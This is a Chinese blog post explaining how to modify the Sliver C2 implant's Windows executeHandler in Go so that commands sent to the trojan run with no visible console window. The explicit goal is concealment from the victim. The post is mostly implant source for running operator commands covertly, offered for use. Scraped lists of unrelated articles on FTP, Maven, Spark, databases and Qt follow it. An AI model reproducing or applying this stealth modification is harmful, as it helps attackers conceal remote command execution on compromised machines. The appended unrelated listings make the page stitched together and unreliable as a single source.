向木马发出指令后, 如果是cmd命令会有一个黑窗口一闪而灭, 不利于木马隐藏, 需要将executeHandlerhandlers.go拷贝到handlers_windows.go里,核心代码为 cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}表示隐藏命令弹窗

func executeHandler(data []byte, resp RPCResponse) {

	var (

		err       error

		stdErr    io.Writer

		stdOut    io.Writer

		errWriter *bufio.Writer

		outWriter *bufio.Writer

	)

	execReq := &sliverpb.ExecuteReq{}

	err = proto.Unmarshal(data, execReq)

	if err != nil {

		// {{if .Config.Debug}}

		log.Printf("error decoding message: %v", err)

		// {{end}}

		return

	}

	execResp := &sliverpb.Execute{}

	exePath, err := expandPath(execReq.Path)

	if err != nil {

		execResp.Response = &commonpb.Response{

			Err: fmt.Sprintf("%s", err),

		}

		proto.Marshal(execResp)

		resp(data, err)

		return

	}

	cmd := exec.Command(exePath, execReq.Args...)

	cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}

	if execReq.Output {

		stdOutBuff := new(bytes.Buffer)

		stdErrBuff := new(bytes.Buffer)

		stdErr = stdErrBuff

		stdOut = stdOutBuff

		if execReq.Stderr != "" {

			stdErrFile, err := os.Create(execReq.Stderr)

			if err != nil {

				execResp.Response = &commonpb.Response{

					Err: fmt.Sprintf("%s", err),

				}

				proto.Marshal(execResp)

				resp(data, err)

				return

			}

			defer stdErrFile.Close()

			errWriter = bufio.NewWriter(stdErrFile)

			stdErr = io.MultiWriter(errWriter, stdErrBuff)

		}

		if execReq.Stdout != "" {

			stdOutFile, err := os.Create(execReq.Stdout)

			if err != nil {

				execResp.Response = &commonpb.Response{

					Err: fmt.Sprintf("%s", err),

				}

				proto.Marshal(execResp)

				resp(data, err)

				return

			}

			defer stdOutFile.Close()

			outWriter = bufio.NewWriter(stdOutFile)

			stdOut = io.MultiWriter(outWriter, stdOutBuff)

		}

		cmd.Stdout = stdOut

		cmd.Stderr = stdErr

		err := cmd.Run()

		//{{if .Config.Debug}}

		log.Printf("Exec (%v): %s", err, string(stdOutBuff.String()))

		//{{end}}

		if err != nil {

			// Exit errors are not a failure of the RPC, but of the command.

			if exiterr, ok := err.(*exec.ExitError); ok {

				execResp.Status = uint32(exiterr.ExitCode())

			} else {

				execResp.Response = &commonpb.Response{

					Err: fmt.Sprintf("%s", err),

				}

			}

		}

		if errWriter != nil {

			errWriter.Flush()

		}

		if outWriter != nil {

			outWriter.Flush()

		}

		execResp.Stderr = stdErrBuff.Bytes()

		execResp.Stdout = stdOutBuff.Bytes()

		if cmd.Process != nil {

			execResp.Pid = uint32(cmd.Process.Pid)

		}

	} else {

		err = cmd.Start()

		if err != nil {

			execResp.Response = &commonpb.Response{

				Err: fmt.Sprintf("%s", err),

			}

		}

		go func() {

			cmd.Wait()

		}()

		if cmd.Process != nil {

			execResp.Pid = uint32(cmd.Process.Pid)

		}

	}

	data, err = proto.Marshal(execResp)

	resp(data, err)

}

c2工具sliver 执行木马命令后会弹窗一闪而过的更多相关文章

  1. 使用 FileZilla FTP Client连接Vsftpd在执行LIST命令后提示连接超时

    使用 FileZilla FTP Client 连接 Vsftpd在执行LIST命令后提示连接超时. vi /etc/vsftpd/vsftpd.conf 添加: #开启被动模式 pasv_enabl ...

  2. 菜鸟调错(七)——控制台中执行mvn命令后提示‘cmd’不是内部或外部命令

    最近在cmd下使用mvn命令时,在执行完以后总会出现一句“‘cmd’不是内部或外部命令,也不是可执行程序或批处理文件”,如下图: 虽然命令执行成功了,不会有什么影响,但是身为强迫症晚期的我是绝对不能忍 ...

  3. linux执行python命令后permission denied

    linux下执行python后显示被拒绝问题定位: 1.检查下要执行的文件的权限是否存在执行权限,否则执行chmod命令赋予权限: 2.若赋予权限后仍然显示没有权限,检查下执行的python文件是否有 ...

  4. crt执行cat命令后乱码

    cat查看二进制文件后所有命令都乱码执行reset即可恢复

  5. 执行xcopy命令后出现Invalid num of parameters错误的解决办法

    作者:朱金灿 来源:http://blog.csdn.net/clever101 在执行一条批处理命令: xcopy /s /i /y C:\ppt D:\Program doc 开始很纳闷,上网一查 ...

  6. linux执行python命令后没有反应,不打印日志信息

    实际的python执行的软连接是路径是/opt/python2.7/bin/python,而设置的软连接错误如下: 修改该连接,是python指向/opt/python2.7/bin/python, ...

  7. [BAT] 执行xcopy命令后出现Invalid num of parameters错误的解决办法

    如果是Windows下的命令行,对于有空格的文件路径要加引号,对于xcopy命令就是源路径和目标路径都要加引号 xcopy "C:\ppt" "D:\Program do ...

  8. spark on yarn,client模式时,执行spark-submit命令后命令行日志和YARN AM日志

    [root@linux-node1 bin]# ./spark-submit \> --class com.kou.List2Hive \> --master yarn \> --d ...

  9. spark on yarn,cluster模式时,执行spark-submit命令后命令行日志和YARN AM日志

    [root@linux-node1 bin]# ./spark-submit \> --class com.kou.List2Hive \> --master yarn \> --d ...

  10. react+ant design 项目执行yarn run eject 命令后无法启动项目

    如何将内建配置全部暴露? 使用create-react-app结合antd搭建的项目中,项目目录没有该项目所有的内建配置, 1.执行yarn run eject 执行该命令后,运行项目yarn sta ...

随机推荐

  1. 达梦数据库varchar和nvarchar的验证

    达梦数据库varchar和nvarchar的验证 测试SQL create tablespace zhaobsh datafile '/opt/dmdbms/data/DAMENG/zhaobsh.d ...

  2. [转帖]总成本降低80%,支付宝使用OceanBase的历史库实践

    https://open.oceanbase.com/blog/5377309696 为解决因业务增长引发的数据库存储空间问题,支付宝基于 OceanBase 数据库启动历史库项目,通过历史数据归档. ...

  3. [转帖]如何通过JMeter测试金仓数据库KingbaseES并搭建环境

    1.安装JMeter Apache JMeter是Apache组织开发的基于Java的压力测试工具,主要用于对软件的压力测试,它最初被设计用于Web应用测试,但后来扩展到其它测试领域.它可测试静态.动 ...

  4. 【转帖】BGP:全穿透,半穿透,静态代播有什么区别

    一. 什么是BGP二. 具体实现方案2.1BGP的优点2.2 真伪BGP在使用效果上有什么差异​​​​​​​​​​​​​​2.2.1 真BGP实现了用户最佳路径的自动选择​​​​​​​​​​​​​​​ ...

  5. 使用 inotifywait的方式监控文件夹发生变化后自动执行脚本的方法

    0. 先安装inotify 最简单的方法为: yum install epel-release 安装扩展包源 yum install inotify-tools 1. 从网上抄了一下脚本 简单记录一下 ...

  6. Mysql localhost 无法登录 root用户的处理过程

    问题说明: 前段时间同事修改密码, 但是发现修改了密码之后,外面可以连接root用户, 但是本地无法连接了. 怀疑是密码修改存在问题,需要重新进行处理 这里进行简单的描述. 问题现象 使用 mysql ...

  7. 【代码分享】使用 avx2 + 查表法,优化凯撒加密

    作者:张富春(ahfuzhang),转载时请注明作者和引用链接,谢谢! cnblogs博客 zhihu Github 公众号:一本正经的瞎扯 接上一篇:[代码分享]使用 avx512 + 查表法,优化 ...

  8. 【学到一个小技巧】context.WithValue 中的 key 可以是个空对象

    作者:张富春(ahfuzhang),转载时请注明作者和引用链接,谢谢! cnblogs博客 zhihu Github 公众号:一本正经的瞎扯 从 netpoll 库看到这段代码: type connk ...

  9. 【SpringBoot】当AOP引发的异常与@RestControllerAdvice擦肩而过:异常处理的盲点揭秘

    各位上午/下午/晚上好呀! 今天在写bug的时候发现一个这样的问题: AOP抛出的异常竟然没有被@RestControllerAdvice注解修饰的异常统一处理类处理. 有一个需求,对某些加了自定义注 ...

  10. C/C++ Qt 监控文件状态变化

    实现对特定文件的监控,Qt中提供了QFileSystemWatcher调用这个接口可以快速实现监控功能,当有文件发生变化是自动触发并输出文件具体信息. filesystem.h #ifndef FIL ...